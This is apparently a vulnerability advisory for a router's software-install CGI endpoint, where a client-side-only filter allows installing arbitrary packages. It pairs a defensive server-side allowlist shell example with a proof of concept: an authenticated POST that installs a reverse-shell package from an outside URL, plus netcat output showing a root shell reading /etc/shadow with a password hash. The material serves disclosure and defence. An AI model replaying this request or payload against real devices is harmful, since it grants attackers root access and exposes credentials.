Abuse of Functionality leads to RCE

Through the software installation feature, it is possible to install arbitrary software, such as a reverse shell, because the filter on the available package list is enforced only on the client side. Software can be installed from the filesystem, from the package list (as the application logic intends), and from a URL. In the Proof of Concept, the basic reverse shell connects back to 192.168.8.140 on port 8888; the connection can be received with a netcat listener on port 8888. The package is available for your tests.
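
The root cause above is that the install endpoint trusts whatever string the browser sends in the name parameter, so the client-side filter is the only thing standing between the catalogue and an arbitrary URL or path. The following POSIX shell snippet is an added example of the server-side check that closes that gap; it is not the vendor's code, and the endpoint wrapper, the allowlist contents and the package names are constructed for illustration. It rejects URLs, filesystem paths and characters outside the opkg package-name charset, and then requires an exact match against the server-side catalogue before any install command is built.

```shell
#!/bin/sh
# Added example, not the vendor's code: server-side validation of the
# "name" parameter for a hypothetical package install CGI endpoint.
# ALLOWED_PACKAGES and every package name below are constructed sample data.

# Constructed allowlist standing in for the server-side package catalogue,
# one package name per line.
ALLOWED_PACKAGES="luci-app-wireguard
wireguard-tools
tcpdump-mini"

# validate_package_name NAME
# Returns 0 only if NAME is a plain package identifier that appears in the
# allowlist; returns 1 for URLs, absolute or relative paths, parent-directory
# components, shell metacharacters, or names not in the catalogue.
validate_package_name() {
    name="$1"
    case "$name" in
        "") return 1 ;;                    # empty parameter
        *://*|/*|*/*|*..*) return 1 ;;     # URL or filesystem path
        *[!a-z0-9._+-]*) return 1 ;;       # outside opkg's name charset
    esac
    # Exact, whole-line, fixed-string match against the catalogue so that
    # "tcpdump" does not pass on the strength of "tcpdump-mini".
    printf '%s\n' "$ALLOWED_PACKAGES" | grep -qxF -- "$name"
}

# install_decision NAME
# Prints the opkg command line that would be run for a valid name, or
# "rejected" otherwise. Printing instead of executing keeps the example
# side-effect free; a real handler would exec the command only on the
# validated branch.
install_decision() {
    if validate_package_name "$1"; then
        printf 'opkg install %s\n' "$1"
    else
        printf 'rejected\n'
    fi
}
```

Because the check runs in the CGI handler rather than in the browser, removing or editing the client-side filter no longer matters: a request carrying a URL or a path in name never reaches opkg. The same whole-line allowlist lookup also defeats the "install from filesystem" path, since a local .ipk path fails the first case pattern before the catalogue is consulted.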

Proof of Concept:

Request

POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 66
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close

name=http://onofri.org/storage/reverse_shell_1.0.0-1_mips_24kc.ipk

On the shell (netcat listener side)

% nc -l 8888
id
uid=0(root) gid=0(root)
cat /etc/shadow
root:$1$lchqx22V$LOxNwv3ggvnFw/kIyD2eB0:19256:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::
dnsmasq:x:0:0:99999:7:::
stubby:x:0:0:99999:7:::
pwd
/www/cgi-bin